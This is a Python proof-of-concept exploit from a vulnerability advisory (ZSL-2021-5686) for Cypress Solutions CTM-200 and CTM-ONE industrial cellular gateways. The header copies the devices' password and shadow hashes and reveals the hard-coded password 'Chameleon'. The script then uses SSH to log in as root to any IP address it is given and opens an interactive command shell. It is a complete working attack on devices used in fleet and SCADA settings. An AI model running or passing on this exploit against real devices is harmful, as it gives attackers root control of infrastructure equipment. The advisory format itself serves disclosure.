#!/usr/bin/env python3 # # # Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH) # # # Vendor: Cypress Solutions Inc. # Product web page: https://www.cypress.bc.ca # Affected version: CTM-ONE (1.3.6-latest) # CTM-ONE (1.3.1) # CTM-ONE (1.1.9) # CTM200 (2.7.1.5659-latest) # CTM200 (2.0.5.3356-184) # # Summary: CTM-200 is the industrial cellular wireless gateway for fixed # and mobile applications. The CTM-200 is a Linux based platform powered # by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard # features make the CTM-200 ideal for mobile fleet applications or fixed # site office and SCADA communications. # # CTM-ONE is the industrial LTE cellular wireless gateway for mobile and # fixed applications. CTM-ONE is your next generation of gateway for fleet # tracking and fixed sites. # # ====================================================================== # CTM-200 # /var/config/passwd: # ------------------- # root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash # admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash # nobody:*:65534:65534:nobody:/var:/bin/false # daemon:*:65534:65534:daemon:/var:/bin/false # # /var/config/advanced.ini: # ------------------------- # 0 # 0 # Chameleon # 0,0,0,0,0,255 # 0,0,0,0,0,255 # 0,0,0,0,0,255 # 0,0,0,0,0,255 # 0,0,0,0,0,255 # 0,0,0,0,0,255 # # # CTM-ONE # /etc/shadow: # ------------ # admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7::: # root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7::: # daemon:*:16009:0:99999:7::: # bin:*:16009:0:99999:7::: # sys:*:16009:0:99999:7::: # ftp:*:16009:0:99999:7::: # nobody:*:16009:0:99999:7::: # messagebus:!:16009:0:99999:7::: # ====================================================================== # # Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials # within their Linux distribution image. This weakness can lead to the # exposure of resources or functionality to unintended actors, providing # attackers with sensitive information including executing arbitrary code. # # Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l) # GNU/Linux 2.6.32.25 (arm4tl) # lighttpd/1.4.39 # BusyBox v1.24.1 # BusyBox v1.15.3 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5686 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php # # # 21.09.2021 # import sys import paramiko bnr=''' o ┌─┐┌┬┐┌─┐ ┌─┐ ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬ ┬ o │ │││││ ┬ ├─┤ ├┬┘│ ││ │ │ └─┐├─┤├┤ │ │ o └─┘┴ ┴└─┘ ┴ ┴ ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o ''' print(bnr) if len(sys.argv)<2: print('Put an IP.') sys.exit() adrs=sys.argv[1]## unme='root'#admin# pwrd='Chameleon'## rsh=paramiko.SSHClient() rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) rsh.connect(adrs,username=unme,password=pwrd) while 1: cmnd=input('# ') if cmnd=='exit': break stdin,stdout,stderr=rsh.exec_command(cmnd) stdin.close() print(str(stdout.read().decode())) rsh.close()